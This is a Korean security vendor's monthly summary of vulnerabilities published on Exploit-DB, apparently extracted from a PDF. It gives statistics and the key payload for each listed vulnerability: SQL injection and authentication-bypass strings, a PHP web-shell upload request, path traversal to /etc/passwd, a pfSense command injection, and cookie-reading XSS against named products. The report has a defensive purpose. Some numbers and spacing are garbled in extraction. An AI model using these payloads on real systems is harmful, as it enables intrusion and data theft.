EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

Size: px
Start display at page:

Download "EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P"

Transcription

1 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두 ' ' 인공격또한 SQL Injection 입니다. 모두 ' ' 인 SQL Injection 케이스 "Advantech WebAccess < 8.3 " 취약점은 URL 경로간에공격코드가삽입되는특이한취약점입니다. 해당취약점을포함여 EDB 분석보고서에공개된취약점에대해예방기위해서최신패치와시큐어코딩을권장합니다. 지만완벽한시큐어코딩은불가능며, 지속적으로보안성을유지기위해서웹방화벽을활용한심층방어 (Defense indepth) 구현을고려해야합니다.. 취약점별보고개수 취약점 보고개수 File Upload 2 Command Injection 3 5 XSS 8 SQL Injection 취약점별보고개수 총합계 File Upload Command Injection XSS SQL Injection 총합계 2. 위험도별분류 위험도 보고개수 백분율 % % 위험도별분류 % 총합계 % 0 3. 공격난이도별현황 공격난이도 보고개수 백분율 % % % 총합계 % 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 CentOS Web 3 2 Local 2 PACSOne Server 2 Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression Worpress Service Finder Booking Zechat Photos in Wifi LearnDash Smart Google Code Inserter Muviko Buddy Zone Events Calendar Joomla! Component Visual Calendar Shopware LiveCRM SaaS Cloud SAP NetWeaver J2EE Engine Affiligator Xnami Wchat pfsense Tumder ImgHosting Flexible Poll Domains & Hostings Manager Learning Management System RISE Task Rabbit Clone ILIAS Multilanguage Real Estate MLM Flash Operator Advantech WebAccess Zomato Clone Joomla! Component CP Event Calendar Reservo Image Hosting Hot s Clone SugarCRM 총합계 50 공격난이도별현황 주요소프트웨어별취약점발생현황 CentOS Web Local PACSOne Server Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression

2 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 POST /wp-admin/options-general.php?page=smartcode HTTP/. POST /wp-admin/options-general.php?page=smartcode HTTP/. action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=o n Smart Smart Google Code Google Code Inserter Inserter < SQL Injection EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection /xdashboard/html/jobhistory/jobdochistorylist.action?model. jobhistoryid= and =2 EMC xpression EMC xpression 4.5SP Patch 3 POST /gespage/webapp/users/prnow.jsp HTTP/ SQL Injection Gespage show_prn=');select PG_SLEEP(3)-- POST /ges/webapp/users/blhistory.jsp HTTP/. Gespage Gespage show_month=');select PG_SLEEP(3) Photos in Wifi.0. - Path /asset.php?id=40c9c b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext] Photos in Wifi Photos in Wifi.0. POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd f File Upload LearnDash Arbitrary File Upload dd f2 Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php Content-Type: application/octet-stream <?php echo exec("ls -la /etc/passwd"); dd f2-- Content-Disposition: form-data; name="post" LearnDash LearnDash foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f SQL Injection < POST /photo/include/blog/label.php HTTP/. < action=get_article_label&article_id=; SELECT version(); < POST /photo/include/file_upload.php?dir=2f2e2e2f f72 652f50686f7 HTTP/. < action=aviary_add&url=file:///etc/passwd Worpress Service Finder Booking < Local File Disclosure /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd Worpress Service Finder Booking Worpress Service Finder Booking < 3.2

3 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. POST /login.php HTTP/ SQL Injection Muviko. b'&password=admxn&login= Muviko Muviko. 추가적인참고정보 # SQL Injection: load_season.php form parameter [GET] season_id # SQL Injection get_raring.php parameter [GET] movie_id # SQL Injection update_rating.php parameters [GET] rating,movie_id # SQL Injection set_player_source.php parameters [GET] id SQL Injection Events Calendar - 'event_id' SQL Injection /event.php?event_id=- 23%20union%20all%20select%20,2,@@version,4,5,6,7,8,9,0, Events Calendar,2,3,4,5,6,7,8,9,20,2,22,23,24,25,26,27,28,29-- Events Calendar POST /UDDISecurityService/UDDISecurityImplBean HTTP/ SQL Injection SAP NetWeaver J2EE Engine 7.40 <soapenv:envelope xmlns:soapenv=" xmlns:sec=" <soapenv:header/> <soapenv:body> <sec:deletepermissionbyid> <permissionid>' AND =(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-52%') AND ''='</permissionid> </sec:deletepermissionbyid> </soapenv:body> </soapenv:envelope> SAP NetWeaver J2EE Engine SAP NetWeaver J2EE Engine XSS Xnami.0 - Cross -Site ing POST /media/ajax HTTP/. Xnami Xnami.0 method=addcomment&comment="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&mediaid= Command Injection pfsense < 'status_rrd_graph_img.php' Command Injection /status_rrd_graph_img.php?database=queues;+printf+'ls - al'+'sh' pfsense pfsense < XSS ImgHosting.5 /?search="><script>confirm(document.domain)<%2fscript> ImgHosting ImgHosting SQL Injection Domains & Hostings Manager PRO Authentication Bypass POST /dhrpro_demo/login.php HTTP/. Domains & Hostings Manager Domains & Hostings Manager PRO 3.0 accusername=admin%27+or+%27%27%3d%27&accuserpassword=admi n%27+or+%27%27%3d%27&login=+enter SQL Injection RISE.9 - 'search' SQL Injection POST /index.php/knowledge_base/get_article_suggestion/ HTTP/. RISE RISE.9 search=product'%20and%20(select*from(select(sleep(20)))a)-- % Command Injection Command Injection ILIAS < Flash Operator Command Execution /setup/setup.php?cmd="><script>alert()</script> /ucp/index.php?quietmode=337&module=callforward&command=./ &ls -al ILIAS Flash Operator ILIAS < Flash Operator POST /demo/foodpanda/myacount.php HTTP/. User-Agent: Mozilla/5.0 (Windows NT 0.0; Win64; x64; rv:57.0) Gecko/20000 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Disposition: form-data; name="fname" Content-Disposition: form-data; name="lname" Content-Disposition: form-data; Content-Disposition: form-data; name="phone" 23 Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to.php) Content-Type: image/jpeg

4 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 File Upload Zomato Clone - Arbitrary File Upload <?php phpinfo();?> Content-Disposition: form-data; name="addr" Zomato Clone Zomato Clone Content-Disposition: form-data; name="addr2" Content-Disposition: form-data; name="post" Content-Disposition: form-data; name="country" Content-Disposition: form-data; name="state" 3945 Content-Disposition: form-data; name="city" 635 Content-Disposition: form-data; name="location" Content-Disposition: form-data; name="update" Upload XSS Reservo Image Hosting.5 /search/?s=image&t=%27%29%3b%2522%2520style%253d%22%3cscrip t%3ealert%28%29%3c%2fscript%3e%3c Reservo Image Hosting Reservo Image Hosting XSS SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> SugarCRM SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/ XSS Shopware 5.2.5/5.3 {"id":22,"groupkey":"ek"," ":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":" T00:00:00","lastLogin":" T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":" ","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," Shopware Shopware 5.2.5/5.3 lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/.

5 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 XSS CentOS Web ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":" T00:00:00","lastLogin":" T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":" ","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," CentOS Web CentOS Web department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} XSS CentOS Web POST /index.php?module=mail_add-new HTTP/. CentOS Web CentOS Web ifpost=yes& _address="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&domain=domain.com&password="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe> XSS CentOS Web 'row_id' / 'domain' SQL Injection POST /index.php?module=list_domains HTTP/. CentOS Web CentOS Web ifpost=yes&username=&domain=' or =--&row_id=' or = SQL Injection LiveCRM SaaS Cloud.0 /livecrm/web/index.php?r=site/login&company_id=%3%20%4f%52 %20%3%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%4%54%5f%5 7%53%28%30%78%33%6%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c% 4f%4f%52%28%52%4%4e%44%28%30%29%2a%32%29%29%20%48%4%56%49 %4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%3 LiveCRM SaaS Cloud LiveCRM SaaS Cloud SQL Injection Affiligator 2..0 /search/?q=&price_type=range&price=%3%30%30%20%6%6e%64%28 %73%65%6c%65%63%74%2%56%65%72%4%79%6%72%69%2d%7e%30%2e%2 0%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20% 67%72%6f%75%70%5f%63%6f%6e%63%6%74%28%56%65%72%73%69%6f%6e %28%29%29%29%79%29%78%29 Affiligator Affiligator SQL Injection Easy Car 204 /site_search.php?s_vehicletype=auto&s_order=[sql]&s_row=%35 %3%20%2f%2a%2%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2 a%2f%20%2f%2a%2%30%35%35%35%35%4%6e%6%6c%79%73%65%2a%2f% 20%28%65%78%74%72%6%63%74%76%6%6c%75%65%28%30%2c%2f%2a%2 %30%35%35%35%35%63%6f%6e%63%6%74%2a%2f%28%30%78%32%37%2c%3 0%78%33%6%2c%40%40%76%65%72%73%69%6f%6e%2c%64%6%74%6%62% 6%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d Easy Car 204 Easy Car SQL Injection Wchat.5 POST /login.php HTTP/. Wchat Wchat.5 User=' UNION ALL SELECT 0x3,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0 x34--& Pass=anything SQL Injection Zechat.5 POST /login.php HTTP/. Zechat Zechat.5 User=' UNION ALL SELECT 0x3,0x32,0x33,concat(0x63)--& Pass=anything

6 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Tumder 2. /category/%2d%33%20%20%2f%2a%2%30%3%3%3%3%55%4e%49%4f% 4e%2a%2f%20%2f%2a%2%30%3%3%3%3%4%4c%4c%2a%2f%20%2f%2a %2%30%3%3%3%3%53%45%4c%45%43%54%2a%2f%20%30%78%33%3%2 c%30%78%33%32%2c%43%4f%4e%43%4%54%28%44%6%74%6%62%6%73% 65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44 %4%54%4%42%4%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%2 8%29%29%2d%2d%20%2d Tumder Tumder SQL Injection Quickad 4.0 /listing?keywords=' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gllf&location=all%20united%20states&placetype=country&place id=23[sql]&cat=[sql]&subcat=5[sql]&filter=&sort=newest&sub mit= Quickad Quickad SQL Injection Flexible Poll.2 /mobile_preview.php?id=- 8888select*/+count(*)/*!08888from*/(information_schema.colu Flexible Poll Flexible Poll SQL Injection Local.0 /sellers_subcategories.php?industryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x ,0x 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ),0x283629,0x283729)-- Local Local SQL Injection Local.0 /suppliers.php?industryid=[sql]&categoryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x ,0x 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ),0x283629,0x283729)-- Local Local SQL Injection Learning Management System - 'course_id' SQL Injection /?type=scoring-status-student&course_id= union+select+,2,3,user()%23 Learning Management System Learning Management System PACSOne Server DICOM Web Viewer - Trasversal /pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.i ni /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..% 2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd PACSOne Server PACSOne Server DICOM Web Viewer SQL Injection PACSOne Server DICOM Web Viewer POST /pacs/usersignup.php HTTP/. hostname=localhost&database=dicom&username= union+select+,2,3,user()%23&password= &first name=&lastname=& = union+select+,2,3,user()%23&action=Sign+Up PACSOne Server PACSOne Server DICOM Web Viewer SQL Injection Task Rabbit Clone.0 - 'id' SQL Injection /pages/single_blog.php?id=%3%20%20%2f%2a%2%3%33%33%33%37 %55%4e%49%4f%4e%2a%2f%20%2f%2a%2%3%33%33%33%37%53%45%4c%4 Task Rabbit Clone 5%43%54%2a%2f%20%3%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c% 34%2c%35%2c%36%2d%2d%20%2d Task Rabbit Clone SQL Injection.0 POST /index.php HTTP/..0 User=' OR -- -&Pass=bypass SQL Injection.0 /site.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38% 55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45 %43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%3 3%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38% 38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6 %32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%2 9%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35% 33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c %28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%7 8%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a% 2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74 %28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6 e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f% 6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74 %5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2 c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d% 65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a %2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2 c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33% 30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38 %33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d SQL Injection.0 /pagelist.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0

7 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection.0 /page_new.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d SQL Injection Hot s Clone - 'subctid' SQL Injection /categories?keyword=&mctid=[sql]&subctid=- Y2h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+( /*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count( Hot s Clone *)/*!08888from*/(information_schema.columns)where@:=export_ set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*! 08888column_name*/,0xa3a,2)),@,2))--+- Hot s Clone SQL Injection Multilanguage Real Estate MLM 'srch' SQL Injection /productlist.php?srch=%73%66%64%27%29%20%20%2f%2a%2%30%38%38%38%38 %55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%4 5%43%54%2a%2f%20%28%3%29%2c%28%32%29%2c%43%4f%4e%43%4%54% 5f%57%53%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c %44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%2 9%29%2c%28%34%29%29%2d%2d%20%2d Multilanguage Real Estate MLM Multilanguag e Real Estate MLM SQL Injection Buddy Zone /chat_im/chat_window.php?request_id=- 55++/*!3337UNION*/+/*!3337SELECT*/+,(Select+export_set( 5,@:=0,(select+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),co lumn_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+- Buddy Zone Buddy Zone SQL Injection Advantech WebAccess < 8.3 /BWMobileService/BWScadaRest.svc/Login/notadmin'%20or%20'x' %3D'x/nopass/ Advantech WebAccess Advantech WebAccess < Joomla! Component Picture Calendar for Joomla /list.php?folder=../../../../etc/passwd Joomla! Component Picture Calendar for Joomla Joomla! Component Picture Calendar for Joomla SQL Injection Joomla! Component CP Event Calendar 'id' SQL Injection /index.php?option=com_cpeventcalendar&task=load&id=%2d%3%2 Joomla! 0%20%2f%2a%2%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a% Component CP Joomla! Component 2%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203 Event CP Event Calendar a20,user(),database(),version())%2c%32%2c%33%2c%34%2c%35%2c Calendar %36%2c%37%2d%2d%20%2d SQL Injection Joomla! Component Visual Calendar 'id' SQL Injection /index.php?option=com_visualcalendar&view=load&id=- %20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM (SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEM A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d674696f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b,4,0x30 ),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2 c0x35%2c0x36%2d%2d%20%2d Joomla! Component Visual Calendar Joomla! Component Visual Calendar 3..3

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.

More information

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다.

More information

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은

More information

EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion

More information

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

